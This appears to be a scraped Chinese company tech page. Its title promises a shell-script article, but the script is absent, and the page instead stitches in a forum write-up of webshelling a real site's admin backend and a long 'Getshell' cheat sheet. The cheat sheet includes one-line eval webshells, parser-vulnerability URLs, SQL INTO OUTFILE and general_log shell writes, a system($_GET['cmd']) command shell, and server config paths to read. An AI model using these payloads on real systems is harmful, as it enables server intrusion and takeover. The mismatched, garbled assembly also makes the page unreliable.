技術文章-shell腳本實現的差集應用

享提綱：

1. 問題背景

2. 代碼實現

1.問題背景

在做公司的測試的自動化測試時，覆蓋了一些開發代碼的函數，但是那些還沒有做，使用一個函數一個函數搜索的方法還是比較慢的，這里提供一種快速找出來還有那些函數沒有做的方法。

大致的思路是，完全使用shell腳本實現:

1)【搜集函數html】

將已經做了的函數，因為可以拿到url的html源碼，匹配出一個函數集合 sourceWeb.log

2)【執行腳本獲取結果】

-- 執行腳本 sh run.sh，里邊做的工作是獲取開發代碼中的函數集合 local_fun.log，遍歷這些函數，沒有在文件sourceWeb.log中的就放到最終結果 result.log

-- result.log 就是那些還未加到自動化測試的開發的函數

2.代碼實現

shell腳本 run.sh的代碼如下，最終生成結果是 result.log

源碼的地址在博客園：http://www.cnblogs.com/aiweixiao/p/6671381.html

遇到問題，解決問題，不斷總結，能力就會不斷提高了~

x01 前言

這個后臺是一個表哥給我的，然后作為菜雞的我去試著弄了一下，搞下了，就分享一下思路，文章很菜，希望各位大表哥手下留情，別噴~（菜雞第一次在春秋寫文章....）

0x02 測試開始

首先，后臺界面是這樣子滴(已處理，若文章漏碼請告知~)

我先去云悉對這個站做了一些簡單識別,得到結果如下圖

大致猜測是由Linux + Apache + Mysql + Php搭配的。但是Apache沒給我顯示他的版本，不知道是否存在解析漏洞。于是回到了后臺，去研究他的上傳文件的功能。

他的這個系統很多地方存在上傳點，下圖就是一個上傳點

他這里可以支持壓縮包的格式并且自解壓，于是我就想到將木馬放到壓縮包內然后上傳這個壓縮包，使其自解壓，將木馬成功上傳到服務器。然后操作結束后，的確是上傳成功了。然而人生就是那么大起大落，并沒有成功的拿下shell，為毛呢，請看下面

首先正常上傳

然后查看上傳后的文件

給我加了個txt.... 心想加了個txt就算了，我打開試試看能不能正常訪問

丫的還是個403拒絕訪問。于是我又測試了幾個后綴的文件名，發現pdf和jpg

等文檔和圖片類型是可以正常上傳并且進行訪問(pdf訪問會自動下載)

不要在意打碼的內容，他的確是可以訪問并且顯示了代碼。。只要腳本文件他就會自動在后面加上txt，于是放棄上傳壓縮包的方法，直接硬干上傳點，試試看能不能運氣爆棚碰巧就是一個解析漏洞.... 然后fuzz了許久，還是不行(就不寫上傳的過程了，沒成功寫了浪費時間~~)

看樣子他的上傳是做了處理了，只能換思路了，然后這個時候逗神告訴了一個點，讓我拿下了這個shell

他這里支持自定義html，用來做搜索引擎優化，于是可以試著寫入php代碼來獲取shell，補充一下php的幾種定義寫法：

1.<? echo 1; ?>
2.<?php echo 2; ?>
3.
<script language="php"> 
echo 3;
</script>

第三種寫法的標簽是不是很熟悉。他不就是html中定義js代碼的標簽嘛~，那么可以試著用這段代碼去試試，看能否被正常寫入進去。

然后我就在自定義代碼去寫上了下面的代碼，保存進去

<script language="php">
phpinfo();
</script>

然后打開網站的首頁

發現還是原網頁，沒有丁點的改變...... 。這個時候查看一下源代碼

的的確確的代碼是被寫進去了，那么刷新一下試試

ok，是正常的，然后執行phpinfo的代碼也已經不見了，已經當作php執行了

那么這個時候，構造一下一句話木馬，然后進行連接操作。

結果是連接不上去，換了其他的刀也是不行的，那么這條路就斷了嘛？shell就搞不定了嘛~

0x03 文件包含getshell

在前面有說到，他這個站有許多上傳點，我隨便找了一個上傳點，上傳了一個圖片格式的大馬，大馬的代碼如下：

<?php

然后通過一樣的步驟用下面的代碼

<script language="php">
include '../ezfiles/2/1002/img/92/123.jpg';//上傳的圖片地址
</script>

然后點擊修改進行保存，在回到網頁去刷新，然后在域名后面加上2.php去測試是否成功生成了這個文件

成功getshell~ 由于是linux，老夫實在沒半點興趣提權啥的..... 就把shell給那位表哥后繼續的去看妹子圖了

0x04 結束語

這次拿shell也不是很難，都是常見的操作，low的一批~ ，滲透就是要把知識點進行串聯起來，然后靈活的進行運用。各位大佬要是有啥高見歡迎私信交流，最后這句是重點，希望大佬們不要吐槽我這個菜雞的文章~~ 有啥意見私下地可以交流，畢竟這文章純屬虛構，如有雷同純屬巧合

文章轉載自：https://bbs.ichunqiu.com/thread-49404-1-1.html

作者i春秋id：最菜的kk

etshell分為進管理員后臺Getshell和不進后臺Getshell，本文主要總結常見進后臺Getshell和部分。

一、進后臺Getshell

進臺Getshel

1、管理員后臺直接Getshell

管理員后臺直接上傳Getshell，有時候帶密碼的Webshell連接時容易被waf攔截，可以上傳不加密的Webshell如有權限限制可以嘗試管理后臺自帶的修改文件名功能在文件名前加../來穿越目錄，如上傳的文件為a.php，將a.php修改為../a.php。

2、后臺數據庫備份Getshell

后臺數據庫備份getshell，上傳圖片馬并獲取圖片馬路徑，通過數據庫備份修改后綴名，如有后綴名無法修改或路徑無法修改限制可修改前端代碼繞過，當所備份的數據庫來源無法修改時，我們可以通過首先將一句話木馬寫入數據庫，比如通過新建管理員用戶，將用戶名用一句話木馬代替（用戶名通常有長度限制，在前端修改maxlength即可），<%eval

然后再通過備份數據庫后訪問此界面Getshell。

二、各類上傳Getshell

各類上傳Getshell

1、修改網站上傳類型Getshell

修改網站上傳類型，后臺設置中添加aasps|asp|php|jsp|aspx|asa|cer，保存后上傳aasps文件，上傳后為asp文件可以解析Getshll。

2、上傳其他腳本類型Getshell

一臺服務器有多個站，如a網站為asp腳本，b網站為php腳本，而a中限制了上傳文件類型為asp的文件，此時可以上傳php的腳本，來拿shell；也可以嘗試腳本文件后綴名改為asa或者在后面直接加個.如xx.asp.來突破文件類型限制進行上傳來Getshell解

三、解析漏洞Getshell

1、IIS6.0解析漏洞

??http://www.xxx.com/xx.asp/xx.jpg??

??http://www.xxx.com/xx.asp/xx.txt??

??http://www.xxx.com/xx.asp/xx.asp;jpg??

2、IIS7.0/7.5、Nginx<8.0解析漏洞

??http://www.xxx.com/xx.jpg/.php??

3、Nginx<8.03空字節代碼執行漏洞

版本范圍：Nginx0.5.,0.6., 0.7 <=0.7.65, 0.8 <=0.8.37

??http://www.xxx.com/xx.jpg%00.php??

4、Apache解析漏洞

??http://www.xxx.com/xx.php.owf.rar??逆向解析，直到能解析出php為止

5、CVE-2013-4547 Nginx解析漏洞

??http://www.xxx.com/xx.jpg（非編碼空格）>??http://www.xxx.com/xx.jpg（非編碼空格）\0.php??<.php??

四、編輯漏洞Getshell

1、網站配置插馬Getshell

進入后臺后，網站配置插馬getshell，可以找到源碼本地搭建，插入時注意與源碼閉合，如果插入出錯可能導致網站報廢。如asp中單引號表示單行注釋作用

??%><%eval request("v01cano")%><%??

2、編輯器模版Getshell

通過網站的模版編寫一句話，然后生成腳本文件getshell 通過將木馬添加到壓縮文件，把名字改為網站的模版類型，上傳到服務器，getshell）（新建或修改目錄名為xx.asp/ 此目錄下的jsp，html會以asp執行，配置iis6.有0解析漏洞。

3、修改腳本文件Getshell

修改后臺腳本文件插入一句話直接Getshell，盡量插在頭和尾。

4、上傳插件、更新頁面Getshell

進入wordpress，dz等，如編輯wordpress404頁面插入一句話，可以先下載對應版本找到404路徑，部分OA上傳插件Getshell， jboss，tomcat上傳war包getshell等。

5、執行sql語句寫入Webshell

首先執行錯誤的sql語句，使其暴露出網站的根目錄，以ecshop為例，進入后臺執行sql查詢

??select "<?php phpinfo();?>" into outfile "C:\vulcms\ecshopv3.6\ecshop\v01cano.php";??

關于此語句說明，在windows中有時候需要使用斜杠/有時候需要使用雙反斜杠\末尾有時候需要分號，有時候也不需要分號。也可以先將一句話通過ecshop的新建管理員寫入到user表中，然后通過數據庫備份配合解析漏洞Getshell。

五、命令執行Getshel

1、Windows

1.echo ^<^?php @eval（$_POST[C0cho]);?^>^ >c:.php

2、Linux

1.echo -e "<?php @assert($_POST[C0cho])?>" > 1.php

Linux需要在$前加\進行防轉義，Windows需要在<前加^防轉義，Windows和Linux中的 “可以使用’或不使用進行嘗試

六、文件包含Getshell

1、asp包含

??include file="123.jpg"??調用的文件必須和被調用的文件在同一目錄，否則找不到，如果不在同一目錄，用下面語句也使用如下代碼??include virtual="文件所在目錄/123.jpg"??

2、php包含

<?php
include('123.jpg');
?>

3、使用php://input

使用burpsuite截取數據包，并修改內容轉發(還可以使用hackbar工具中的post data中輸入??<?php fputs(fopen("shell1.php","w"),'1111<?php @assert($_POST[xss])?>2222')?>等一句話木馬)??

截取get請求

將一句話木馬

訪問瀏覽器查看是否成功

七、數據庫命令執行Getshell

1、Access導出

Access可導出xxx等文件需要配合解析漏洞。

create table cmd (a varchar(50));
insert into cmd (a) values ('一句話木馬') #一句話木馬如：<%execute request(1)%>
select * into [a] in 'e:\web\webshellcc.asa;x.xls' 'excel 4.0;' from cmd
drop table cmd

菜刀直連??https://www.webshell.cc/1.asa;x.xls??

2、Sqlserver導出

exec sp_makewebtask 'C:\test1.php','select "<%eval request("pass")%>"

3、Mysql導出

以phpMyAdmin為例:

方法一

create TABLE xiaoma (xiaoma1 text NOT NULL);
insert INTO xiaoma (xiaoma1) VALUES('<?php eval（$_POST[xiaoma]);?>');
select xiaoma1 from xiaoma into outfile 'D:/phpstudy/www/7.php';
drop TABLE IF EXISTS xiaoma;

方法二

select "<?php eval（$_POST[v01cano]);?>" into outfile 'D:/phpstudy/www/a.php'

方法三

當數據庫路徑未知時Getshell

1.//創建表a,并且將httpd.conf寫入到表a中

2.create table a(a text);load data infile "C:/phpStudy/Apache/conf/httpd.conf" into table a;

然后執行導出操作，將該文件下載，使用notepad++打開，最后搜索documentroot，即可找到網站的根目錄：

文件可能存在的一些路徑：

# Windows
c:\windows\php.ini # php配置文件
c:\windows\system32\inetsrv\MetaBase.xml # IIS虛擬主機配置文件
# Linux
/etc/php.ini # php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf # Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf

10./usr/local/mysql

11./user/local/httpd/conf/httpd.conf

12./usr/local/apache/conf/extra/httpd-vhosts.conf # 虛擬目錄配置文件

13./user/local/nginx/conf/httpd.conf # Nginx配置文件

方法四

通過load_file函數直接加載該文件內容

1、select load_file('C:/phpStudy/Apache/conf/httpd.conf');

同時需要做如下配置

方法五

general_log_file方法獲取Webshell，show global variables like 'secure%'顯示secure_file_priv的值為NULL，不能利用寫into outfile寫木馬getshell。

1、show global variables like "%genera%"; #查看genera文件配置情況

2、set global general_log=off; #關閉general_log

3、set global general_log='on'; #如果general_log關閉需要開啟

4、set global general_log_file='D:/www/web/shell.php'

方法六

可執行命令方式

??select '<?php echo \'<pre>\'; system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/shell.php'??

使用方法

www.xxx.com/shell.php?cmd=ipconfig #cmd=后面加命令

方法七

過殺毒軟件方式，上傳圖片馬c.jpg，圖片馬內容如下：

??www.xxx.com/shell.php?cmd=ipconfig #cmd=后面加命令??

導出Webshell

??select '<?php include 'c.jpg'?>' INTO OUTFILE 'D:/work/www/shell.php'??

方法八

直接導出加密Webshell

??select unhex('加密代碼') into dumpfile 'D:/www/web/shell.php'??

八、不進后臺Getshell

1、0day Getshell

各類OA，coremail，cms，php框架，數據庫，java框架等0day，1day，nday Getshell 。

2、寫入日志Getshell

獲取日志路徑，在訪問過程中在url或者其他位置寫入??<?php eval（$_POST[c]);?>;??等信息，使其日志記錄此代碼，然后訪問日志路徑，菜刀連接Getshell，如phpinfo();中能查看到error.log和access.log的路徑。

3、IIS/Tomcat寫權限Getshell

IIS6.0，put協議上傳手工或工具，批量掃描工具：iis put scaner，寫權限利用：桂林老兵

Tomcat put上傳 CVE-2017-12615 工具傳送門：https://link.zhihu.com/?target=https%3A//github.com/iBearcat/CVE-2017-12615

4、上傳會員頭像Getshell

將Webshell放入文件夾，然后壓縮成zip文件。上傳正常頭像抓包將圖片文件內容刪除，burp右鍵選擇文件黏貼功能，將zip包內容復制到burp中的圖片內容，放行后菜刀連接圖片上傳路徑下的文件夾（zip壓縮包名）下的Webshell 。

5、遠程命令執行

參考Linux/Windows反彈shell，腳本語言、powershell反彈shell，Kali/Cobalt Strike等各種上線方法。

6、其他漏洞Getshell

XXE，SSRF，反序列化，strust2等一種或多種組合利用Getshell 。

在線咨詢

上一篇：HTML5的優勢都有哪些？
下一篇：從 25 分鐘到 7 分鐘，我們用了這些方法提升 R

您的項目需求

*請認真填寫需求信息，我們會在24小時內與您取得聯系。

整合營銷服務商

技術文章-shell腳本實現的差集應用

1.問題背景

2.代碼實現

您的項目需求